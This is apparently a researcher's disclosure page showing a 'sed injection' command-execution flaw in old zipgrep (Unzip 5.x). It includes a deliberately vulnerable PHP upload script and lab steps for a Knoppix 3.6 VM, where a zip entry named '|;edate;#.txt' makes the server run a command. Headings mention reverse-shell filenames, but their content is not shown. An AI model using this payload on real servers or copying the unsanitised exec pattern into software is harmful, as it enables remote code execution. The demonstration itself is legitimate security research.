a sample of a vulnerability in ancient zipgrep

written by cleemy desu wayo / licensed under CC0 / last update: 2023-08-13

uploaded file infomartion:

(no file uploaded)

'); } else{ $is_zip_str = 'no'; $original_file_basename = basename($_FILES['file']['name']); $original_file_pathinfo = pathinfo($original_file_basename); if($original_file_pathinfo['extension'] === 'zip') { $is_zip_str = 'yes'; // exec zipgrep exec('zipgrep CVE "'. $_FILES['file']['tmp_name']. '"', $search_results); // move to ./zip_stored/ move_uploaded_file($_FILES['file']['tmp_name'], './zip_stored/'. $original_file_basename); // save search results $fp = fopen('./zip_stat/latest-search-result.txt', 'w'); foreach ($search_results as $line) { fwrite($fp, $line. "\n"); } fclose($fp); } print('

file name: '. htmlspecialchars($_FILES['file']['name']). '

'); print('

tmp file name: '. htmlspecialchars($_FILES['file']['tmp_name']). '

'); print('

stored to zip_stored/ directory: '. htmlspecialchars($is_zip_str). '

'); } ?>

try upload a file:

about this bug

This is an ancient vulnerability of zipgrep in Unzip 5.x. zipgrep is a wrapper script. Perhaps this problem does not exist for zipgrep in Unzip 6.x.

I have notified the developers of Unzip about this bug on Feb 12, 2022. The current maintainer is aware of the bug, but it is likely that a fixed version will not be released.

I call this bug or something similar "sed injection". There is a similar vulnerability like CVE-2005-0758. I became aware of sed injection on my own in 2013, but I was not aware of CVE-2005-0758 at that time.

This sample is a modified version of "a sample of CVE-2005-0758" ( https://gitlab.com/-/snippets/2580438 ).

about sed injection

try this sample on Knoppix 3.6

Apache 1.3.31, PHP 4.3.8, and vulnerable zipgrep are installed from the beginning when booting from Knoppix 3.6 (released at 2004) Live CD.

you can run this sample on Knoppix 3.6 very easily without special settings.

download Knoppix iso

try RCE

  1. boot Knoppix Live CD ordinarily
  2. put this file (test-zipgrep.php) on /var/www/ on server. "server" means Knoppix.
  3. change owner and chmod (on server)$ cd /var/www
    $ sudo chown www-data:www-data test-zipgrep.php
    $ sudo chmod 600 test-zipgrep.php
  4. start apache (on server)$ sudo apachectl start
  5. try connect from a client machine to http://<knoppix>/test-zipgrep.php
    (when Knoppix is running on VirtualBox or some such, "client machine" means host OS)
  6. create some directories in /var/www (on server)$ cd /var/www
    $ sudo mkdir zip_stat
    $ sudo mkdir zip_stored
  7. change owner and chmod (on server)$ sudo chown www-data:www-data zip_stat zip_stored
    $ sudo chmod 707 zip_stat zip_stored
  8. create a ordinary text file (on client)$ echo CVE-2099-0001 > hoge.txt
  9. create a text file with a crafted filename (on client)$ echo CVE-2099-0002 > '|;edate;#.txt'
  10. archive these files into one .zip (on client)
    $ zip test1.zip *.txt
      adding: hoge.txt (stored 0%)
      adding: |;edate;#.txt (stored 0%)
  11. access from the client machine to http://<knoppix>/test-zipgrep.php
    and upload test1.zip
  12. check if you have successfully uploaded (on server)$ cd /var/www/zip_stored
    $ sudo wc -c test1.zip
    348 test1.zip.
  13. check if date command was executed and the search result is weird (on server)
    $ cd /var/www/zip_stat
    $ cat latest-search-result.txt
    hoge.txt:CVE-2099-0001
    Sun Aug 13 15:49:50 EDT 2023
    CVE-2099-0002

crafted filenames examples

several commands

exec xgalaga on server-side

get a reverse shell